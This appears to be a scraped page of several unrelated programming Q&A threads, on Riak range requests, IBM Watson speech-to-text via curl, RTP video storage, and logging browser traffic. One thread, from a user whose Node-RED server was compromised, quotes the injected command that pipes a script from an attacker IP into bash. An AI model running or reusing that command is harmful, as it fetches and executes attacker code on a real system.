How to configure Riak 1.3.* with range request (Accept-Ranges: bytes) - request

I'm trying to use riak for storing of video contents. I'm allready able to push my video to riak with the correct mite type and I also receive the Video by its URL.
The riak page tells me, that riak in version 1.3.* is capable of supporting range requests.
But curl -I MYRIAKVIDEOURL doesn't return the Accept-Ranges: bytes HTML Header (like my apache is doing. Also when trying to make a reange request by VLC (by seeking to the middle of the Video), it seems, there is no range request initiated, as loading takes long and network shows a lot of downloaded traffic. When doing the same with the Video URL offered by my apache server (tried on the same machine), range request are working well within VLC.
Anyone any Idea on how to achieve this on riak (running on Debian 7, compiled from source, tried also with Ubuntu 12.04)? Am I able to manipulate the HTTP Headers, riak will send?
thanks for the help

Do you intend to use Riak? I think Riak CS is suitable for storage of video files.
Riak CS support Range header for GET Object request.
Sample request by s3curl is like:
s3curl.pl -- -v -x localhost:8080 -H 'Range: bytes=1000-2000' \
http://yourbuckethere.s3.amazonaws.com/your/file/here

Related

Terrible Watson transcription

I'm trying to use Watson to create the transcription of an audio file in brasilian portuguese. I made the call to the api and the result returned successfully. But the transcription is beyond terrible. It's absolutely useless, with no word being recognized correctly.
I used the following command:
curl -X POST -u "apikey:<key>" --header "Content-Type: audio/mp3" --data-binary #./file.mp3
"https://api.us-south.speech-to-text.watson.cloud.ibm.com/instances/<code>/v1/recognize/model=pt-BR_BroadbandModel"
The test audio consists in a 9 min part of a 90 mins audio. It's an interview of a resercher with a dockworker. It has been recorded with a cel phone. I have upload it here, for examination: https://drive.google.com/file/d/1Xuibxksudp55uwaz6oSOccTZ3pP7Dya9/view?usp=sharing
It's not possible that Watson has a so terrible transcription. What am I missing ? do I have to set some parameter or do some work in the audio first ?
I tried the narrowband model also. Tried flac also.
the watson ibm api seems not to be properly codd for end users, the reasons seem their api design is overcomplicated for transcriptions.
it has a bug I believe their team has not been able to decode
It is however advisable to work with google
and speechRecognition
pip install --upgrade SpeechRecognition(linux, unix systems)
or C:\path_to_ python.exe -m pip install --upgrade SpeechRecognition (windows)
this is one module that has all the built in
capacity for the different api creators such as ibm
google, microsoft etc,
just by using
import speech_recogntion as sr
r = sr.Recognizer()
with sr.AudioFile("path to audio file") as source:
#r.adjust_for_ambient_noise() depending on if you have background noise
audio = r.record(source)
then ;
recognize the file out put
where xxx is the api creator from a list. say
google, ibm, azure or bing(with microsoft)
t = r.recognize_xxx(audio, credentials, ...)
read up more on the module to be more precise
this is only a rough guide

How to start the actual "Speech to text"?

I am a freelancing author and have gathered tons of hours of interview material which needs to be transcribed.
While browsing the Internet I came across IBM Watson "Speech to text" which should be the ideal solution to handle that huge amount of spoken word.
After registration I am struggling with even opening it. Since I am not very much equipped with programming, etc.
Can someone provide an example with steps that I can follow to achieve my task?
which platform you want to use Speech to text service on it ?
If you are not a coder, then the best starting point for you will be Node-RED. Take a look at this tutorial that creates a translator - https://developer.ibm.com/tutorials/build-universal-translator-nodered-watson-ai-services/?cm_mmc=IBMDev--Digest--ENews2019-_-email&spMailingID=39408813&spUserID=MzYzODEwODAwNzk4S0&spJobID=1500992192&spReportId=MTUwMDk5MjE5MgS2
If uses Speech to Text, Translation, and Text to Speech. You will only need the Speech to Text bit. Once you get it working with a microphone you can make use of the file inject to push your own audio files through the service.
For larger files you will need to make use of http post and multi-parts, when you get to that point, raise a new question, tag it with node-red and someone will post a sample flow for you.
You do not need to have any programming knowledge to use Watson Speech To Text. You can just send your files to the service using the curl tool. Which you can easily install in your computer, it is free.
Then you can send a file to the service running the following command:
curl -X POST -u "apikey:{apikey}" --header "Content-Type: audio/flac" --data-binary #audio-file2.flac "https://stream.watsonplatform.net/speech-to-text/api/v1/recognize"
You just need an apikey to run that command, which you can get following these steps: https://cloud.ibm.com/docs/services/watson?topic=watson-iam
Then just replace the .flac file in that command by the file you want to process. And pass the right value for the Content-Type: header. For Flac files it is audio/flac, for other audio formats you have the list here: https://cloud.ibm.com/apidocs/speech-to-text

Remove Multiple Node-Red Flows - Raspberry Pi LAMP Hack

I have a raspberry pi LAMP server which I use as a hobby. I also have Node-Red installed which I use for ESp8266 Sensors.
I looked at Node-Red today and there are possibly 40 - 50 flows added (which I did not create). They are all the same timestamp, feeding to message payload. The payload is
curl -s http://192.99.142.248:8220/mr.sh | bash -sh
The same as is reported here:
SolrException: Error loading class 'solr.RunExecutableListener' + '/var/tmp/sustes' process
Does anyone know how I can delete all flows? Can I delete and clean install Node-Red? I don't have anything on the RPi which I need to keep. Thanks.
Please refer to this post on the Node-RED forum: https://discourse.nodered.org/t/malware-infecting-unsecured-node-red-servers/3460
This comes as a result of exposing Node-RED to the internet without applying any security.
Your safest course of action is to wipe the SD card and start with a clean system.
Make sure you enable security this time - details in the post linked above.

How to receive H264 stream via RTP and store to file?

I'm trying to make a server that receives RTP/H264 video streams from android clients and stores these to file.
Currently I'm using VLC in the server, which works well. However, I am worried that VLC is a heavyweight solution that may not scale well. As I'm not actually playing the video, only saving it to file, I thought there must a be a more efficient solution.
Currently I'm planning on using an Amazon ec2 instances, so the goal is to serve as many clients as possible per instance.
I'm flexible (willing to learn) on the language side, I'd like to choose the right language for the job.
So, does anyone know of a good, scalable way to store these streams to files?
Thanks in advance!
EDIT
FFmpeg or libav look promising. Looking into them now.
Basically you need an library that supports rtp stack server side, so you can extract the payload and just append to a file as it comes. ffmpeg is a great choice, and it does have rtp stack and it also it can generate containers(MP4,...) for you as well; if needed. Actually VLC uses ffmpeg's libav library under the hood.

Cache Outgoing Data from browser

This might be a very broad question. But this is what i want. I open a website and enter some details in the website like my credentials to login or it may be any data that pass from my browser to the website. Now what i want is that i should cache ( write to a temp file ) whatever that i send to that website. How can this be done? I tried to extract the data present in the packets that are flowing out of my machine but i find only junk characters in that (may be header). any ideas are welcomed. I am using Ubuntu Linux and would like to achieve this using shell script/C/C++
One option would be to use the Fiddler Web Debugger which is scriptable (C#).
Although it's a Win32 program, it can act as a proxy for any Linux machine. See Debug traffic from another machine (even a Mac or Unix box) for details.
There's also a native Linux app called dsniff which can be used to log all HTTP traffic to a file.

Resources